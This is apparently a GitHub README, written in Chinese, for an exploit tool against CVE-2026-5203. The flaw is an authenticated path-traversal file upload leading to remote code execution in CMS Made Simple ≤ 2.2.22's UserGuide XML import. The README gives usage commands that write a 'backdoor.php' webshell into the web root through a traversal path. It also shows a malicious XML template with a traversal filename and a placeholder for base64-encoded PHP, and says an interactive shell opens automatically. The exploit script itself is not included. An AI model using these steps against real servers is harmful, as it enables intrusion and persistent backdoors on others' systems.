CaginKyr/CVE-2026-5203
GitHub: CaginKyr/CVE-2026-5203
这是一个针对CMS Made Simple ≤ 2.2.22版本远程代码执行漏洞的利用工具。
Stars: 0 | Forks: 0
# CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 远程代码执行漏洞 (路径遍历 + 任意文件上传)
  
## 摘要
在 **CMS Made Simple ≤ 2.2.22** 版本中,`UserGuide` 模块的 XML 导入功能未能对用户提供的文件名进行过滤,允许经过身份验证的管理员通过路径遍历序列将任意文件(例如 PHP 网页木马)上传到服务器文件系统的任何位置。
| 字段 | 值 |
|--------------------|---------------------------------------------------|
| **类型** | 路径遍历 / 任意文件上传 → 远程代码执行 |
| **组件** | `UserGuide` 模块 — XML 导入 |
| **受影响文件** | `modules/UserGuide/lib/class.UserGuideImporterExporter.php` |
| **CVSS v3.1** | `7.2 HIGH` — `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` |
| **所需权限** | 是 (管理员) |
## 漏洞代码
```
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir = (string) $xmlFile->isdir;
```
该函数将 Base64 解码后的内容直接写入攻击者控制的路径。
## 使用方法
```
python exploit.py [upload_path]
```
**示例:**
```
# 默认路径
python exploit.py http://target.com http://target.com/admin admin password123
# 自定义上传路径
python exploit.py http://target.com http://target.com/admin admin password123 \
../../../../../../var/www/html/backdoor.php
```
如果上传后的网页木马可以访问,交互式 shell 将会自动启动。
## 恶意 XML 结构
```
UserGuide
1.3
../../../webshell.php
0
[BASE64_ENCODED_PHP_CODE]
```
标签:CISA项目, CMS Made Simple, CMS安全, CVE-2026-5203, JavaScript, OpenVAS, PHP, RCE, Web Shell, Web安全, XML解析, 上传漏洞, 后门, 威胁模拟, 安全漏洞, 文件上传, 漏洞分析, 管理员权限, 编程工具, 网络信息收集, 蓝队分析, 路径探测, 路径遍历, 远程代码执行, 逆向工具